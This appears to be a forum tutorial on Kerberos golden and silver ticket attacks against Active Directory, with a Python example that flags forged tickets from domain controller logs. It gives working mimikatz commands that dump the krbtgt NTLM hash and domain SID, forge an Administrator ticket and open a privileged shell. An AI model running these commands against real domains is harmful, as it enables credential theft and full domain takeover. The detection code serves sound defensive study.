Guide: Golden Ticket Attack Part one

Ernestbok

KDC Overview

The Key Distribution Center (KDC) is the Active Directory service that issues Ticket Granting Tickets (TGTs) to clients so they can access services with proper authentication and authorization. Just as every service in AD is associated with an account, the KDC has its own service account, KRBTGT, a default account that is created during AD installation.

What if we could somehow impersonate the KRBTGT account? Yes, we would effectively become the KDC and could forge valid TGTs to access any resource on the Active Directory network.

The Golden/Silver Ticket Attack
Golden ticket attacks are post-exploitation attacks that give the attacker unrestricted access to the domain. Because the attacker effectively controls the KDC, which is responsible for issuing Ticket Granting Tickets (TGTs), she holds a golden ticket to access any resource in the domain.

To impersonate the KRBTGT account we need the NTLM hash of the krbtgt account and the SID of the domain it belongs to.

We are going to use mimikatz to dump the password hash and the SID (Security Identifier), generate a golden ticket, and then use a Pass The Ticket attack to get a privileged session.



The Silver Ticket Attack

This is similar to the Golden Ticket attack; the key difference is that we forge a TGS ticket for one particular service rather than for all the resources of the domain. TGS tickets are encrypted with the password hash of the service account, so an attacker who steals the hash of a service account can forge TGS tickets for that service.

The attacker forges the TGS ticket using the service account password hash; no intermediary TGT (Ticket Granting Ticket) is needed. That means a Silver Ticket can be created without any communication with a Domain Controller, making the attack stealthier: the DC never sees the forged ticket, so detection has to rely on the logs of the targeted host itself.
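The two observations above (a golden ticket carries a TGT no DC ever issued; a silver ticket never touches a DC at all) can be turned into a log correlation check. The following is an added example, not code from the original post: it joins DC events 4768 (TGT requested) and 4769 (service ticket requested) with host logon events 4624 over constructed sample data, and flags tickets that have no matching issuance at any DC.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, not real logs. Tuple layout:
# (timestamp, event id, account, host the event refers to, log source).
# 4768 = TGT requested (DC log), 4769 = service ticket requested (DC log),
# 4624 = successful Kerberos logon recorded on the member server ("host" log).
SAMPLE_EVENTS = [
    ("2024-05-01T08:00:00", 4768, "alice", "WS01", "dc"),
    ("2024-05-01T08:00:05", 4769, "alice", "WS01", "dc"),
    ("2024-05-01T08:00:06", 4624, "alice", "FS01", "host"),
    # Golden ticket pattern: service tickets requested with a TGT no DC ever issued
    ("2024-05-01T09:12:00", 4769, "administrator", "WS07", "dc"),
    ("2024-05-01T09:12:01", 4624, "administrator", "FS01", "host"),
    # Silver ticket pattern: Kerberos logon on the service host, no TGS request at any DC
    ("2024-05-01T10:30:00", 4624, "sqlservice", "SQL01", "host"),
]

TGT_LIFETIME = timedelta(hours=10)  # default domain maximum ticket lifetime


def _parse(events):
    return [(datetime.fromisoformat(t), eid, acct.lower(), host, src)
            for t, eid, acct, host, src in events]


def find_forged_ticket_candidates(events, window=TGT_LIFETIME):
    """Return (label, account, host, time) for tickets with no DC issuance inside `window`.

    Logs from every DC in the domain must be aggregated first; a TGT obtained
    before the log window began will otherwise show up as a false positive.
    """
    parsed = sorted(_parse(events))
    tgt_times = defaultdict(list)  # account -> times a DC issued a TGT (4768)
    tgs_times = defaultdict(list)  # account -> times a DC issued a service ticket (4769)
    for when, eid, acct, _host, src in parsed:
        if src == "dc" and eid == 4768:
            tgt_times[acct].append(when)
        elif src == "dc" and eid == 4769:
            tgs_times[acct].append(when)

    def issued_before(times, when):
        return any(when - window <= t <= when for t in times)

    findings = []
    for when, eid, acct, host, src in parsed:
        if src == "dc" and eid == 4769 and not issued_before(tgt_times[acct], when):
            findings.append(("tgs_without_tgt", acct, host, when.isoformat()))
        elif src == "host" and eid == 4624 and not issued_before(tgs_times[acct], when):
            findings.append(("logon_without_tgs", acct, host, when.isoformat()))
    return findings
```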





Golden/Silver Attack in Action
Run mimikatz and use the command below to dump the NTLM hash and SID needed to create the golden ticket. To create a silver ticket we change the /name: value to dump the hash of either a domain admin account or a service account such as the SQLService account.

The LSA module of mimikatz interacts with the Windows Local Security Authority (LSA) to extract credentials.

/inject — inject into LSASS to extract credentials
/name — account name of the target user account
lsadump::lsa — query the LSA server to retrieve the SAM/AD database that stores the password hashes




Command: lsadump::lsa /inject /name:krbtgt


[Image: 1.png]


The highlighted text is the SID of the domain, and in the Primary section we can see the NTLM hash.

Command: kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id:
[Image: 2.png]

kerberos::golden — create golden/silver tickets
/domain — the domain name
/sid — the SID of the domain
/user — the username to impersonate
/krbtgt — NTLM password hash of the domain KDC service account (KRBTGT)
/id (optional) — the user's RID; the mimikatz default is 500
The command above creates a golden ticket; to create a silver ticket we simply put the service account's NTLM hash into the /krbtgt slot and use the service account's SID for /sid.


Command: misc::cmd

Once the ticket is generated and saved, the command above opens a new cmd window running with the privileges of the ticket we just generated, which lets us access resources as needed.


Credits: Medusa